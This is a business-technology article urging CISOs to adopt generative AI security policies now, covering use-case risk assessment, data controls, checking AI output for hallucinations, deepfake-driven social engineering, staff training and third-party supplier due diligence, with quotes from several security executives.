If you don’t already have a generative AI security policy, there’s no time to lose

The boom in business adoption of generative AI as a useful tool is raising concerns in the cybersecurity community that the introduction of the technology is outpacing the introduction of guidelines governing its use, especially given the well-documented security threats and data privacy risks it can introduce.

As business use cases skyrocket, the message for CISOs is clear: if you don’t have a strong AI security policy specifically pertaining to generative AI you need to make one right away. While rules around the introduction and use of AI have typically been murky in enterprises, generative AI is a new beast — it’s evolving quickly, it is enormously promising, and it comes with some very serious security implications.

The challenge for CISOs is to develop cybersecurity policies that not only embrace and support business adoption of this technology but effectively address risk without stifling innovation. Any who think they can put this off for a year or two to see how generative AI develops, hoping to retrofit a security policy appropriate for generative AI’s pervasiveness later down the line, should carefully consider what happened with shadow IT. Businesses were slow off the mark from a security policy perspective to deal with personal technology when it began being used for corporate activities.

Why you need an AI security policy now

AI adoption, especially the use of generative AI, is growing at a fast rate, yet organizations have not necessarily assessed the potential security risks. According to a recent Splunk/Foundry survey, 79% of public sector and 83% of private sector organizations have started to use generative AI in production systems. The primary objective is automation with about half the respondents saying they are or are about to use the technology to increase productivity through automation. Other use cases for AI include innovation and idea generation (30%), improving goods or services (29%), and detecting and assessing cyber risk (26%).

Companies are also adopting externally created large language models (LLMs) at a rapid rate; 69% of public sector companies report that they are or will soon use LLMs compared to 57% for private sector companies. This raises concerns over the risks of using LLMs produced by a third party, including questions about the LLMs’ training, usage, and biases. Most of the Splunk/Foundry survey respondents (78%) say they want global ethical principle to guide the regulation of AI and LLMs.

The problem is that organizations are moving faster with their AI initiatives while industry and government are trying to work out what the proper guidelines and regulations for AI and LLMs should be. That’s why they should be establishing their own security policies for the use of AI to help mitigate the most likely risks from their particular use cses.

Heed the lessons learned from shadow IT

Over time, security teams have tried to reign in shadow IT with policies that mitigate the plethora of risks and challenges it has introduced, but many remain due to its scale. Figures from research firm Gartner revealed that 41% of employees acquired, modified, or created technology outside of IT’s visibility in 2022, while 2023 shadow IT and project management survey from Capterra found that 57% of small and midsized businesses have had high-impact shadow IT efforts occurring outside the purview of their IT departments.

Although generative AI is quite a different thing, it’s taking off far quicker than shadow IT did. The lesson is that security-focused policies should be put in place in the early stages as new technology use grows and not after it reaches an unmanageable scale. Adding to the pressures are the potential security risks generative AI can insert into businesses if unmanaged, which are very much still being understood.

Security-focused generative AI policies are needed now

Most organizations have been experimenting with generative AI use in some way over the last few months, but now they really need to consider security policy implications, says NetSkope CISO Neil Thacker. “They’re in that stage where they’re looking to see the true value of the services, but very soon, they’re going to have to start thinking about controlling it.”

A recent Salesforce survey of more than 500 senior IT leaders revealed that although the majority (67%) are prioritizing generative AI for their business within the next 18 months, almost all admit that extra measures must be taken to address security issues while successfully leveraging the technology.

The problem is that most organizations, regardless of size or industry, are experiencing the same challenge around how to control and manage the secure use of generative AI, Thacker says. “Where does generative AI sit within a policy set and policy framework? Is it about access control? Is it around the encryption of data? Is it around elements of threats like malware?”

The sophistication of generative AI’s evolving capabilities and its growing pervasiveness suggests it’ll touch all those and more, but it’s up to CISOs and security teams to get ahead of that, Thacker says. An effective generative AI security policy can be built upon the trusty security triad of people, process, and technology, but generative AI’s uniqueness puts greater emphasis on a continual feedback loop relating to business-wide use cases, potential risks, and policy application, he adds.

Business alignment is the CISO’s biggest challenge and opportunity

Therein lies the CISO’s biggest generative AI security policy challenge and their biggest opportunity — business alignment. It’s a challenge because most organizations will buy, not build, generative AI, and many may not even buy it directly but receive it via bundled integrations. This requires a significant investment of time to understand, as many generative AI businesses use cases as possible along with the expanding capabilities of generative AI itself, molding them into a policy. It’s an opportunity because it means security controls can be baked into adoption from inception, in line with business needs and goals.

The ultimate aim is to create a top-down, business-appropriate security policy that can be understood and adopted across a company, almost autonomously. It can’t be something that sits isolated within security and different business functions should be able to apply it for the secure use of generative AI without being handheld by security teams.

“It comes down to classical risk management,” says Jon France, CISO at (ISC)2. “Understand what’s important for the business and understand the risks of either developing or using this technology in relationship to what the business does.”

Know your business’ generative AI use cases

Generative AI use cases, and therefore security policy, will differ not only from one business to another but also potentially between departments (another reason why this needs to be well-understood). Organizations that work with particularly sensitive information, or in highly regulated industries, may be tempted to ban the use of AI altogether.

Some companies have already done so: Samsung banned its use after an accidental disclosure of sensitive company information while using generative AI. However, this type of strict, blanket prohibition approach can be problematic, stifling safe, innovative use and creating the types of policy workaround risks that have been so prevalent with shadow IT. A more intricate, use-case risk management approach may be far more beneficial.

“A development team, for example, may be dealing with sensitive proprietary code that should not be uploaded to a generative AI service, while a marketing department could use such services to get the day-to-day work done in a relatively safe way,” says Andy Syrewicze, a security evangelist at Hornetsecurity. Armed with this type of knowledge, CISOs can make more informed decisions regarding policy, balancing use cases with security readiness and risks.

Learn all you can about generative AI’s capabilities

As well as learning about different business use cases, CISOs also need to educate themselves about generative AI’s capabilities, which are still evolving. “That’s going to take some skills, and security practitioners are going to have to learn the basics of what generative AI is and what it isn’t,” France says.

CISOs are already struggling to keep up with the pace of change in existing security capabilities, so getting on top of providing advanced expertise around generative AI will be challenging, says Jason Revill, head of Avanade’s Global Cybersecurity Center of Excellence. “They’re generally a few steps behind the curve, which I think is due to the skill shortage and the pace of regulation, but also that the pace of security has grown exponentially.” CISOs are probably going to need to consider bringing in external, expert help early to get ahead of generative AI, rather than just letting projects roll on, he adds.

Data control is integral to generative AI security policies

“At the very least, businesses should produce internal policies that dictate what type of information is allowed to be used with generative AI tools,” Syrewicze says. The risks associated with sharing sensitive business information with advanced self-learning AI algorithms are well-documented, so appropriate guidelines and controls around what data can go into and be used (and how) by generative AI systems are certainly key. “There are intellectual property concerns about what you’re putting into a model, and whether that will be used to train so that someone else can use it,” says France.

Strong policy around data encryption methods, anonymization, and other data security measures can work to prevent unauthorized access, usage, or transfer of data, which AI systems often handle in significant quantities, making the technology more secure and the data protected, says Brian Sathianathan, Iterate.ai co-founder and CTO.

Data classification, data loss prevention, and detection capabilities are emerging areas of insider risk management that become key to controlling generative AI usage, Revill says. “How do you mitigate or protect, test, and sandbox data? It shouldn’t come as a surprise that test and development environments [for example] are often easily targeted, and data can be exported from them because they tend not to have as rigorous controls as production.”

Generative AI-produced content must be checked for accuracy

Along with controls around what data goes into generative AI, security policies should also cover the content that generative AI produces. A chief concern here relates to “hallucinations” whereby large language models (LLMs) used by generative AI chatbots such as ChatGPT regurgitate inaccuracies that appear credible but are wrong. This becomes a significant risk if output data is over-relied upon for key decision-making without further analysis regarding its accuracy, particularly in relation to business-critical matters.

For example, if a company relies on an LLM to generate security reports and analysis and the LLM generates a report containing incorrect data that the company uses to make critical security decisions, there could be significant repercussions due to the reliance on inaccurate LLM-generated content. Any generative AI security policy worth its salt should include clear processes for manually reviewing the accuracy of generated content for rationalization, and never taking it for gospel, Thacker says.

Unauthorized code execution should also be considered here, which occurs when an attacker exploits an LLM to execute malicious code, commands, or actions on the underlying system through natural language prompts.

Include generative AI-enhanced attacks within your security policy

Generative AI-enhanced attacks should also come into the purview of security policies, particularly with regard to how a business responds to them, says Carl Froggett, CIO of Deep Instinct and former head of global infrastructure defense and CISO at Citi. For example, how organizations approach impersonation and social engineering is going to need a rethink because generative AI can make fake content indistinct from reality, he adds. “This is more worrying for me from a CISO perspective — the use of generative AI against your company.”

Froggett cites a hypothetical scenario in which generative AI is used by malicious actors to create a realistic audio recording of himself, fit with his unique expressions and slang, that is used to trick an employee. This scenario makes traditional social engineering controls such as detecting spelling mistakes or malicious links in emails redundant, he says. Employees are going to believe they’ve actually spoken to you, have heard your voice, and feel that it’s genuine, Froggett adds. From both a technical and awareness standpoint, security policy needs to be updated in line with the enhanced social engineering threats that generative AI introduces.

Communication and training key to generative AI security policy success

For any security policy to be successful, it needs to be well-communicated and accessible. “This is a technology challenge, but it’s also about how we communicate it,” Thacker says. The communication of security policy is something that needs to be improved, as does stakeholder management, and CISOs must adapt how security policy is presented from a business perspective, particularly in relation to popular new technology innovations, he adds.

This also encompasses new policies for training staff on the novel business risks that generative AI exposes. “Teach employees how to use generative AI responsibly, articulate some of the risks, but also let them know that the business is approaching this in a verified, responsible way that is going to enable them to be secure,” Revill says.

Supply chain management still important for generative AI control

Generative AI security policies should not omit supply chain and third-party management, applying the same level of due diligence to gauge outside generative AI usage, risk levels, and policies to assess whether they pose a threat to the organization. “Supply chain risk hasn’t gone away with generative AI – there are a number of third-party integrations to consider,” Revill says.

Cloud service providers come into the equation too, adds Thacker. “We know that organizations have hundreds, if not thousands, of cloud services, and they are all third-party suppliers. So that same due diligence needs to be performed on most parties, and it’s not just a sign-up when you first log in or use the service, it must be a constant review.”

Extensive supplier questionnaires detailing as much information as possible about any third-party’s generative AI usage is the way to go for now, Thacker says. Good questions to include are: What data are you inputting? How is that protected? How are sessions limited? How do you ensure that data is not shared across other organizations and model training? Many companies may not be able to answer such questions right away, especially regarding their usage of generic services, but it’s important to get these conversations happening as soon as possible to gain as much insight as possible, Thacker says.

Make your generative AI security policy exciting

A final thing to consider are the benefits of making generative AI security policy as exciting and interactive as possible, says Revill. “I feel like this is such a big turning point that any organization that doesn’t showcase to its employees that they are thinking of ways they can leverage generative AI to boost productivity and make their employees’ lives easier, could find themselves in a sticky situation down the line.”

The next generation of digital natives are going to be using the technology on their own devices anyway, so you might as well teach them to be responsible with it in their work lives so that you’re protecting the business as a whole, he adds. “We want to be the security facilitator in business – to make businesses flow more securely, and not hold innovation back.”

Data and Information Security, Generative AI, Security, Security Practices